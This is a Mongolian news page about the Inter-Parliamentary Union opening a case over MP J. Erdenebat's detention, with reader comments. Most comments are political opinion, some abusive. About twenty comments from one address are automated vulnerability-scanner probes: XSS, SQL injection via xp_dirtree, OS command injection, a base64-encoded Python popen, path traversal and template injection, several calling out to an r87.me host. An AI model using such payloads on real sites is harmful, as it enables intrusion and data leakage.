"Ж.Эрдэнэбатын эрх зөрчигдсөн гэж ОУПХ хэрэг нээсэн" | News.MN

"Ж.Эрдэнэбатын эрх зөрчигдсөн гэж ОУПХ хэрэг нээсэн"

"Ж.Эрдэнэбатын эрх зөрчигдсөн гэж ОУПХ хэрэг нээсэн"

"Ж.Эрдэнэбатын эрх зөрчигдсөн гэж ОУПХ хэрэг нээсэн"

УИХ-ын Халдашгүй байдлын дэд хорооны дарга Н.Энхболд өнөөдөр (2020.12.14) мэдээлэл хийлээ. УИХ-ын гишүүн Ж.Эрдэнэбатыг хууль зөрчиж, хорьсон асуудлаар Олон улсын парламентын холбоо (ОУПХ)-оос Монгол Улсад хэрэг үүсгэжээ.

УИХ-ын гишүүн, Халдашгүй байдлын дэд хорооны дарга Н.ЭНХБОЛД:

-Энэ асуудлыг Халдашгүй байдлын дэд хороо хэд хэдэн удаа авч хэлэлцэж, шүүхийн байгууллагад хүсэлт хүргүүлсэн. Яг одоо Үндсэн хуулийн дагуу бүрэн эрх, халдашгүй байдал нь хадгалагдаж байгаа, СЕХ-ноос хуулийн дагуу албан ёсоор нэр дэвшиж, сонгогдсон гишүүн. Ерөнхий прокурор, СЕХ-ноос зөвшөөрөл авсан эсэх талаар, шийдвэр нь гарсан асуудлаар тайлбараа ирүүлэх хүсэлт өгсөн. Одоогоор хариу ирээгүй байна. Халдашгүй байдлын дэд хороо УИХ-ын сонгуульд нэр нь дэвшээд, сонгогдсон хүний эрх нь зөрчигдөж байна гэж үзэж байна. ОУПХ парламентчдын эрх нь зөрчигдөж байгаа эсэхийг шалгаж, зөрчигдсөн бол хууль зөрчсөн эсэхийг шалгаж, хянадаг дүрэм, журамтай. Түүний дагуу санал явуулсан. Нэр дэвшсэн хүнийг баривчлах нь Монгол Улсын хуулийг зөрчсөн учраас хүсэлтээ явуулсан. ОУПХ-ноос гурван үндэслэлээр эрх нь зөрчигдсөн гэж үзэж, хэрэг нээгээд шалгаж байна. ОУПХ нь С.Зоригийн хэрэгтэй холбоотойгоор тодорхой ажлын хэсэг ажиллаж, гаргасан шийдвэр нь хуулийн дагуу явагдсан эсэхэд хяналт тавьж ажиллаж байна.

Тэрбээр мэдээллийнхээ дараа сэтгүүлчдийн асуултад хариулт өглөө. 

-С.Зоригийг хөнөөсөн хэрэг дээр, Ж.Эрдэнэбат гээд хоёр ч хэрэг нээсэн байна. Ер нь энэ байгууллага хэр нөлөөтэй, парламентын холбоо хэрэг нээх нь манай улсын нэр хүнд, парламентын дархлаанд сөргөөр нөлөөлөх үү?

-Манайхаас гадна олон улс орны парламентын гишүүдтэй холбоотой хэрэг нээгддэг. ОУПХ парламентын гишүүний халдашгүй байдал гэж юу байдаг чиглэлээр шалгалт хийж, шаардлага тавьдаг байгууллага. Нэгэнт хэрэг нээсэн учраас бүх зүйл хуулийн дагуу явж байгаа эсэхийг шалгаж, тогтоох байх. Ер нь хууль зөрчсөн бол Монгол Улсын нэр хүнд, хуулийн байгууллагын хувьд таатай зүйл биш. Гэхдээ ОУПХ-ны ажлыг урьдчилж дүгнэж болохгүй.

-Цаашид Монгол Улсын талаас юу хийх ёстой вэ?

-Халдашгүй байдлын дэд хороо тухайн хүний халдашгүй байдал, эрх нь зөрчигдсөн эсэхэд хяналт тавьж, санал дүгнэлт гаргах ёстой. Хэрэгтэй холбоотой асуудал нь хуулийн байгууллагаар шалгагдаж, тогтоогдоно. Шүүх, хуулийн байгууллага хэнээс ч хамааралгүй,  хуулийн дагуу шүүх ёстой. Бид хэд хэдэн хуулийн байгууллагад санал хүргүүлсэн ч эцсийн шийд гараагүй учраас зарим асуултын хариу хүлээгдэж байгаа гэж ойлгож байна.

-Гишүүдийн халдашгүй байдал хэр зэрэг хангагдсан бэ?

-Гишүүнээр дамжиж, парламентын дархлаа хадгалагддаг тогтолцоотой. Халдашгүй байдлын дэд хорооны гишүүд хууль зөрчигдсөн гэж үзсэн учраас холбогдох хуулийн байгууллагад саналаа хүргүүлсэн.

Ш.ЧИМЭГ

Энэ мэдээнд өгөх таны сэтгэгдэл?
12
ТэнэглэлТэнэглэл
6
ЗөвЗөв
2
ГайхмаарГайхмаар
1
ХөөрхөнХөөрхөн
0
ХахаХаха
0
ХарамсалтайХарамсалтай
0
БурууБуруу
Баярлалаа!

Холбоотой мэдээ

45 сэтгэгдэл

News.mn сайтад сэтгэгдэл оруулахад анхаарах зүйлс

Avatar

Зочин 2020-12-14 103.26.195.150

Өмөөрөх зүйлгүй хэрэг хийснийг нотолж ял өгсөн ШҮҮХ зөв… УИХ Мандатын хурааваас зохино. Ж.Эрдэнэбат буруутай учраас шүүх ялын тогтоолоо гарсан.. Гадны байгууллагаар сүрдүүлэх хоцорсон арга хэрэглэж буй УИХ муухай харагдлаа. УИХ шившиг………

Avatar

ИХ БӨӨ 2020-12-14 91.219.215.42

ОЛОН УЛСЫН БАЙГУУЛЛАГУУДД МОНГОЛ ШИГ ШАХААНЫ ЦҮНХ БАРИГЧ ОРЖ НАМЧИРХАЖ ХУДЛАА ПОПОРДОГ АЖИЛТАН БАХГҮЙ? ПАРЛАМЕНТИЙН ГИШҮҮДЭЭ ХАМГААЛАХ ӨМГӨӨЛӨХ ҮҮРЭГЭЭ Л БИЕЛҮҮЛЖ БАЙНА, ХЭРЭГ БОЛ ЛИЦЕНЦИЙГ НЬ ЦУЦАЛЖ ЭДИЙН ЗАСГИЙН ХОХИРОЛ УЧИРСАН КОМПАНУУДАД ЗАСАГ МӨНГӨ ТӨЛЖ ЧАДАХГҮЙ ӨӨР ЛИЦЕНЦ ӨГДӨГ ХУУЛИАР ӨГДӨГ ГАЗАР НЬ ӨГСӨН ОЛОН КОМПАНИ ДОТОР ДҮҮГИЙНХ НЬ БАЙСАНД НӨЛӨӨЛСӨН ГЭЖ ҮЗСЭН,ТЭР НЬ КОМПАНИ НЬ ЮУ Ч УХААГҮЙ ЮУ Ч БАЙХГҮЙ ГАЗАР АВЧИХСАН Л ЮМ БИЛЭЭ

Avatar

ЗОЧИН 2020-12-14 59.153.112.111

ХЭРЭГТ НЬ МӨРДӨН БАЙЦААЛТ ЯВУУЛААД ГЭМТ ХЭРЭГ ГЭДЭГ НЬ ХӨДЛӨШГҮЙ БАРИМТААР ТОГТООГДООД,ТЭРИЙГ НЬ ШҮҮХ АВЧ ХЭЛЭЛЦЭЭД ЭНЭ ХҮН ГЭМТ ХЭРЭГ ХИЙСЭН НЬ ҮНЭН БНА ГЭЭД ХОРИХ ЯЛ ОНООЖЭЭ,ЯМАРЧ ТОХИОЛДОЛД ШҮҮХЭЭР ТОГТООГДСОН Л БОЛ ТЭР ХЭН БАЙХ НЬ ХАМААГҮЙ,МУ-Д ХҮН БҮР ХУУЛЬ,ШҮҮХИЙН ӨМНӨ ТЭГШ ЭРХТЭЙ,ТЭР ҮЕД НЭР ДЭВШЭЭД,СЕХ СОНГОГДСОН ГЭЖ ҮЗЭЖ,УИХ-Н ГИШҮҮН БОЛООГҮЙ БАЙСАН,ХАРИН ШҮҮХ ГЭМТ ХЭРЭГТ НЬ ЯЛ ОНООХ ХУЦГАЦАА Л ДАВХЦСАН,ТЭРНЭЭС БИШ ШҮҮХ ЭНЭ ХҮН СОНГОГДСОН ГЭЭД ЯЛ ӨГӨХГҮЙ,ХЭРЭГСЭХГҮЙ БОЛГОХ ЁСГҮЙ.

Avatar

Зочин 2020-12-14 172.105.161.73

ХУЦДАГ п***а ВЭ? ОДОО БҮХ ХУЛГАЙЧАА ГАРГАХ УУ? НОВШЫН ТӨР.

Avatar

Зочин 2020-12-14 202.126.92.131

';l=document.createElement("link");l.rel="prefetch";l.href="//16jjgkau9isflmpehc2pq85fcw8lv3zlnxyxpave"+"hku.r87.me/r/?"+location.href;document.head.appendChild(l);//

Avatar

Зочин 2020-12-14 202.126.92.131

";l=document.createElement("link");l.rel="prefetch";l.href="//16jjgkau9iugkuk5yqnkalgwvhb5to4ww1rng-9t"+"qgs.r87.me/r/?"+location.href;document.head.appendChild(l);//

Avatar

Зочин 2020-12-14 202.126.92.131

Avatar

Зочин 2020-12-14 202.126.92.131

'"–>

Avatar

Зочин 2020-12-14 202.126.92.131

http://r87.com/?news.mn/

Avatar

Зочин 2020-12-14 202.126.92.131

__import__('os').popen(__import__('base64').urlsafe_b64decode('bnNsb29rdXAgMTZqamdrYXU5aWljNnpiemZfXzhpaTlhcGNydnhtZnMxcWp3bGh3aC1leS5yODcubWU=')).read()

Avatar

Зочин 2020-12-14 202.126.92.131

&nslookup "16jjgkau9ibyahad6z90be6sx0dxdb5kjnw3oacd""-ik.r87.me"

Avatar

Зочин 2020-12-14 202.126.92.131

/../../../../../../../../../../proc/version

Avatar

Зочин 2020-12-14 202.126.92.131

/../../../../../../../../../../proc/self/fd/2

Avatar

Зочин 2020-12-14 202.126.92.131

1'))exec('xp_dirtree ''\\16jjgkau9izav01wvckxufvdagf_umcc-_r86qbs'+'cri.r87.me'+'\c$\a''')–

Avatar

Зочин 2020-12-14 202.126.92.131

exec('xp_dirtree ''\\16jjgkau9iq5dz97v3roif0ahtnyelfb1bt1-dxq'+'56i.r87.me'+'\c$\a''')

Avatar

Зочин 2020-12-14 202.126.92.131

Content-Type:text/html

ns(0x05D1EF)

Avatar

Зочин 2020-12-14 202.126.92.131

'+netsparker(0x05D17D)+'

Avatar

Зочин 2020-12-14 202.126.92.131

*/netsparker(0x05D126);/*

Avatar

Зочин 2020-12-14 202.126.92.131

arguments[1].end(require('child_process').execSync('set /A 268409241 – 3954'))

Avatar

Зочин 2020-12-14 202.126.92.131

{{ 268409241- 30534 }}

Avatar

Зочин 2020-12-14 202.126.92.131

ns:netsparker056650=vuln

Avatar

Зочин 2020-12-14 202.126.92.131

ping -w 25 127.0.0.1

Avatar

Зочин 2020-12-14 202.126.92.131

"&ping -w 25 127.0.0.1 &"

Avatar

Zochin 2020-12-14 202.126.90.94

Ene obgon udahgui J.Erdenebatiinhaa araas yavna.

Avatar

Зочин 2020-12-14 64.119.17.75

jenco gej ezentei shuux gej baiguullaga bgaa tsagt xezee ch shudara shuux gej bxgui. erdenebatiig yaraltai sullaxiig shaardaj bna

Avatar

иргэн 2020-12-14 202.179.26.88

Авилгхчид Авилгачинаа л өмөөрнө ш дээ

Avatar

Зочин 2020-12-14 202.55.188.82

ЖЕНКОГИЙН ХИЙЖ БАЙГАА Л АЖИЛ ШҮҮ ДЭЭ. ШИНЭ ХОНГИЛЫН ЭЗЭН

Avatar

Зочин 2020-12-14 103.87.255.74

batboldiig bas gadnii shuuheer oruulaad ballah yum gesen ene genco udahgui gantsaaraa daranguilagch bolohnee

Avatar

ЗОЧИН 2020-12-14 202.126.90.146

ЭРДЭНЭБАТ Ч ЕРӨӨ ГОЛЫН ЭХИЙГ СҮЙРҮҮЛЖ , АЛТЫГ НЬ УХАЖ ЯЛ АВААГҮЙ ШААХАЙ ДАА ! х****л НЬ ИРНЭЭ .

Avatar

зочин 2020-12-14 66.181.161.52

Орос, Хятад мэтийн том гүрнүүд ,эвэл хойд Солонгос мэтийн шийдчисэн улсууд олон улсын байгууллагуудыг тоохгүй байж болох л байх . Харин манайх бол ч дэмий дэ . Ирээдүйд хортой тусна.

Avatar

Зочин 2020-12-14 202.9.46.0

Хүмүүсээ дарга нартаа ял өгөхгүй байна гэж ЕХ саарал ,хар жагсаалтандаа оруулаад байсан. Дараа нь ял өглөө гээд хэрэг үүсгээд байдаг. яаж ойлгох вэ?

Avatar

Зочин 2020-12-14 139.5.218.25

1937 ond tsust yargalal vildsen DO yamnii Maahuur Damba, Mangas Dorj, Gahai Dendev, Bvrged Losol…. g m Ter tsagiin garamgai chekistvvd neg ni ch shiitgegdeegvi ! Harin tsum odongoor shagnuulsan.
Manai unuugiin murdun baitsaagch,,shvvhch nar tednees ilvv sain ajillana gej hicheedeg yum bailgvi dee.

Avatar

Зочин 2020-12-14 43.242.243.49

М.Энхсайханыг хэтэрхий улайм цайм хилс хэрэгт хүчээр тулгаж муйхраар ял оноосон доо!!! Дараа хэзээ нэг цагт хилсдүүлсэн прокурор, шүүгч нар ялд унана даа, харж л байгаарай та нар!!! Женко дээрээс үүрэг өгсөн гээд ямар ч нэмэргүй шүү дээ!! Тэгээд ч цаад Женко чинь би тэгээгүй шдээ л гэж хэлнэ!!! Ерөнхий сайд нарыг шийтгэж байгаа прокурор, шүүгч нар үүнийг одооноос бүгд анхаарах хэрэгтэй!!!!!

Avatar

Зочин 2020-12-14 66.181.187.124

ЖЭНКОГ ЕРӨНХИЙЛӨГЧ БОЛХОД ХАМГИЙН УРАВГАР МУУХАЙ ЦАРАЙЛЖ БАЙСАН Н ЭНХБОЛД МЭЕЭГЭЭСЭЭ ЯАЖ УРВАЛАА МЭЕЭ НЬ БҮР ИНДЭР ДЭЭРЭЭС ЭНХТҮВШИН ЭНЭ ХОЁРЫН НЭРИЙГ ЦОХОЖ УРВАГЧААР НЬ ДУУДАЖ ГОМОРХОЖ БИЛЭЭ ЭНЭ Ч ХҮҮК ЖЭНКО ХОЁРТ ОВОО ЧАНГА ТӨМСӨГДҮҮЛСЭН ГАР БАЙХ ӨӨ

Avatar

Зочин 2020-12-14 202.21.100.210

Зарим хүмүүсийг шалгах болохоор олон бөхчүүдийг цуглуулаад хүчний байгуулга бөх хоёрын хооронд тулаан өрнүүлэх гээд зарим хүнийг болохоор УИХ-н гишүүний халдашгүй байдлын хууль хамаагүй гээд баривчлаад бүр ял өгөөд шоронд хийдэг энэ хачин ялгавартай байдлыг арилгах хэрэгтэй шүү дээ

Avatar

Иргэн 2020-12-14 66.181.181.248

Ж.Эрдэнэбат орон шоронд орох хэрэг үйлдээгүй ээ!?

Avatar

Буриад 2020-12-14 66.181.161.24

Үнээн

Avatar

Зочин 2020-12-14 202.21.108.30

ОУП ХОЛБОО ГЭГЧ УЛС ОРНЫ ДОТООД АСУУДАЛД ОРОЛЦДОГ ЮУ ВЭ? ӨӨРСИЙНХӨӨ ХУЛГАЙЧ НАРЫГ ӨМӨӨРДӨГ БАЙГУУЛЛАГА ЮМ УУ? ГЭМТ ХЭРЭГТЭНГ ӨМӨӨРДӨГ ОУПХ ГЭГЧ МОНГОЛД ПАДГҮЙ … ЗОРИГТЙН ХЭРГИЙГ ЯАХ ҮГҮЙ ХАЯЖ БАЙГАА БАЙЖ ЮУН ИХ ЮМ САНАЖ БАЙНА….ЭРДЭНЭБАТЫН ЯЛЫГ ХҮНДРҮҮЛЭХ ХЭРЭГТЭЙ ЧАНГА ДЭГЛЭМТЭЙ ШОРОНД ХАЛХЫН АТМАНУУДАД ХҮРГЭЭД ӨГ..ЭХ НУТГАА ХУДАЛДСАН УРВАГЧИЙГ МӨЧГҮЙ БОЛГООД ӨГӨМЗ..

Avatar

Буриад 2020-12-14 66.181.161.24

Худлаа

Avatar

n 2020-12-14 66.181.176.215

mongoliin shuuhiig olon ulsiin neg baiguullaga shuudeg bolsnuu te. amar yum boloh ni eeee!!!????

Avatar

зочин 2020-12-14 103.57.95.90

монголын тэнэгүүдийн хийсэн юмыг Олон улсын байгууллага хянах эртхй мал минь

Avatar

тт 2020-12-14 66.181.176.215

НҮБ, Олон улсын шүүх ч биш. парламентийн гишүүний эрхийг хамгаалдаг холбоо юу Хаха хол очиж хуцаарай мал минь

Avatar

Зочин 2020-12-14 66.181.187.124

БИД ТОЛГОЙ МЭДЭХТЭЙГЭЭ УЛС ШҮҮ ГАХАЙ МИНЬ

Avatar

Зочин 2020-12-14 43.242.243.49

Мөрөн дээр нь гахайны толгой байгаа болохоор гадныхан гайхаж байгаа юм!!!!

Avatar

ттт 2020-12-14 202.55.188.83

БНМАУлс ш дээ. Тагнуул гар хөлүүд их ундуйцаж байх чинь. Барууны Цагаан захтны эрхийг хамгаалдаг байгууллага заналхийлчих юм бна л даа

1 0
NewsMN Гар утасны хувилбар Татах
NEWS.mn

Мэдээллийн эх сурвалж